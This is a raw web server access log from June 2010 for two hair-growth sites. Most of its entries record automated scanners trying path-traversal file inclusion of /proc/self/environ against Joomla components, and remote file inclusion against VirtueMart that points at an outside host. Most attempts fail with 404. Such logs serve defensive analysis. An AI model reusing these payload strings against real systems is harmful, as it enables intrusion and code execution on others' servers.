65.60.49.18 - - [20/Jun/2010:17:55:35 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:55:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:55:35 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:55:56 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:55:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:17:55:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:17:56:02 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [20/Jun/2010:17:56:12 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:17:56:56 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:57:14 -0700] "GET /logs/access_100405.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:57:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:57:14 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:17:57:15 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:57:15 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:57:15 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
121.78.118.123 - - [20/Jun/2010:17:57:16 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
65.60.49.18 - - [20/Jun/2010:17:58:00 -0700] "GET /logs/access_100419.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:58:28 -0700] "GET /logs/access_100405.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:58:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
65.60.49.18 - - [20/Jun/2010:17:58:28 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:17:58:56 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:17:58:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:17:58:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:59:46 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:17:59:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:17:59:46 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:17:59:56 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:59:57 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:17:59:57 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:18:00:16 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:00:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:00:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:18:00:22 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:00:22 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:00:22 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
174.121.64.231 - - [20/Jun/2010:18:00:43 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:18:00:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:18:00:43 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:01:53 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:01:54 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:01:55 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:02:25 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:02:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:02:26 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:02:42 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:02:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:02:44 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
174.121.64.231 - - [20/Jun/2010:18:03:36 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:18:03:36 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:18:03:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:18:03:36 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:03:42 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:03:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
91.121.210.81 - - [20/Jun/2010:18:03:48 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:18:03:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
91.121.210.81 - - [20/Jun/2010:18:03:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:03:48 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:04:43 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:18:04:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:18:04:43 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
174.121.188.69 - - [20/Jun/2010:18:05:25 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.188.69 - - [20/Jun/2010:18:05:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.188.69 - - [20/Jun/2010:18:05:25 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
74.52.119.106 - - [20/Jun/2010:18:05:34 -0700] "GET /logs/access_100405.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
74.52.119.106 - - [20/Jun/2010:18:05:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
74.52.119.106 - - [20/Jun/2010:18:05:35 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
74.52.119.106 - - [20/Jun/2010:18:07:19 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
174.121.188.69 - - [20/Jun/2010:18:07:21 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.188.69 - - [20/Jun/2010:18:07:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.188.69 - - [20/Jun/2010:18:07:21 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.195.114.238 - - [20/Jun/2010:18:09:02 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [20/Jun/2010:18:09:02 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:09:18 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:09:18 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:09:18 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:09:59 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:10:37 -0700] "GET /logs/access.log HTTP/1.1" 200 68026 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
68.127.243.75 - - [20/Jun/2010:18:10:54 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:03 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:04 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:11:09 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:12 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:13 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:11:15 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:11:16 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:11:36 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:11:37 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:12:06 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:12:06 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:12:32 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:12:38 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:13:08 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:13:09 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:13:27 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:13:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
68.127.243.75 - - [20/Jun/2010:18:13:29 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 720896 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:13:29 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
68.127.243.75 - - [20/Jun/2010:18:13:30 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:13:41 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:13:41 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:13:42 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
68.127.243.75 - - [20/Jun/2010:18:13:53 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:13:54 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:14:22 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:14:31 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:14:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:14:32 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:14:34 -0700] "GET /logs/access_100419.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:14:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
